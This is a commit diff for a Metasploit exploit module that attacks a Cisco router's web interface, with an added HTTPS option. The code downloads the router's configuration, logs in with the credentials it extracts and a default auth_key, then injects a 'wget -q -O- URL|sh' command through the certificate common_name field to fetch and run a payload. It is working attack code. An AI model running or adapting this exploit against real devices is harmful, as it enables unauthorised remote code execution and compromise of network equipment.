Checked the functionality of module. Added ability to connect via HTTPS.

master
blightzero 2019-03-14 15:54:02 +01:00
parent 0551f3df3c
commit 1e00c28701
1 changed files with 38 additions and 28 deletions


@ -58,8 +58,10 @@ class MetasploitModule < Msf::Exploit::Remote
register_options([ register_options([
Opt::RPORT(8007), # port of Cisco webinterface Opt::RPORT(8007), # port of Cisco webinterface
OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']), OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]) OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),
OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.
]) ])
deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.
end end
def execute_command(cmd, opts = {}) def execute_command(cmd, opts = {})
@ -79,13 +81,19 @@ class MetasploitModule < Msf::Exploit::Remote
def primer def primer
payload_url = get_uri payload_url = get_uri
print_status("Downloading configuration from #{peer}") print_status("Downloading configuration from #{peer}")
res = send_request_cgi({'uri'=>normalize_uri("cgi-bin","config.exp")}) if(datastore['USE_SSL'])
print_status("Using SSL connection to router.")
end
res = send_request_cgi({
'uri' => normalize_uri("cgi-bin","config.exp"),
'SSL' => datastore['USE_SSL']
})
unless res unless res
vprint_error('Connection failed.') vprint_error('Connection failed.')
return nil return nil
end end
unless res.status == 200 unless res.code == 200
vprint_error('Could not download config. Aborting.') vprint_error('Could not download config. Aborting.')
return nil return nil
end end
@ -99,6 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Using default auth_key #{authkey}") print_status("Using default auth_key #{authkey}")
res2 = send_request_cgi({ res2 = send_request_cgi({
'uri' => normalize_uri("cgi-bin","userLogin.cgi"), 'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
'SSL' => datastore['USE_SSL'],
'method' => 'POST', 'method' => 'POST',
'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password=" 'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password="
}) })
@ -108,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
return nil return nil
end end
unless res.status == 200 unless res.code == 200
vprint_error('Login failed with downloaded credentials. Aborting.') vprint_error('Login failed with downloaded credentials. Aborting.')
return nil return nil
end end
@ -120,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Sending payload. Staging via #{payload_url}.") print_status("Sending payload. Staging via #{payload_url}.")
#Build staging command #Build staging command
command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'") command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'")
if(command_string.length <= 50) if(command_string.length <= 63)
print_status("Staging command length looks good. Sending exploit!") print_status("Staging command length looks good. Sending exploit!")
else else
vprint_error("Warning: Staging command length probably too long. Trying anyway...") vprint_error("Warning: Staging command length probably too long. Trying anyway...")
@ -128,31 +137,32 @@ class MetasploitModule < Msf::Exploit::Remote
res3 = send_request_cgi({ res3 = send_request_cgi({
'uri' => normalize_uri("certificate_handle2.htm"), 'uri' => normalize_uri("certificate_handle2.htm"),
'SSL' => datastore['USE_SSL'],
'method' => 'POST', 'method' => 'POST',
'cookie' => cookies, 'cookie' => cookies,
'vars_get' => { 'vars_get' => {
'type' => '4', 'type' => '4',
}, },
'vars_post' => { 'vars_post' => {
'page' => 'self_generator.htm', 'page' => 'self_generator.htm',
'totalRules' => '1', 'totalRules' => '1',
'OpenVPNRules' => '30', 'OpenVPNRules' => '30',
'submitStatus' => '1', 'submitStatus' => '1',
'log_ch' => '1', 'log_ch' => '1',
'type' => '4', 'type' => '4',
'Country' => 'US', 'Country' => 'A',
'state' => 'CA', 'state' => 'A',
'locality' => 'DC', 'locality' => 'A',
'organization' => 'cc', 'organization' => 'A',
'organization_unit' => 'A', 'organization_unit' => 'A',
'email' => 'any@example.com', 'email' => 'any@example.com',
'KeySize' => '512', 'KeySize' => '512',
'KeyLength' => '1024', 'KeyLength' => '1024',
'valid_days' => '30', 'valid_days' => '30',
'SelectSubject_c' => '1', 'SelectSubject_c' => '1',
'SelectSubject_s' => '1' 'SelectSubject_s' => '1'
}, },
'data' => "common_name=#{command_string}" 'data' => "common_name=#{command_string}"
}) })
unless res3 unless res3
vprint_error('Connection failed while sending command. Aborting.') vprint_error('Connection failed while sending command. Aborting.')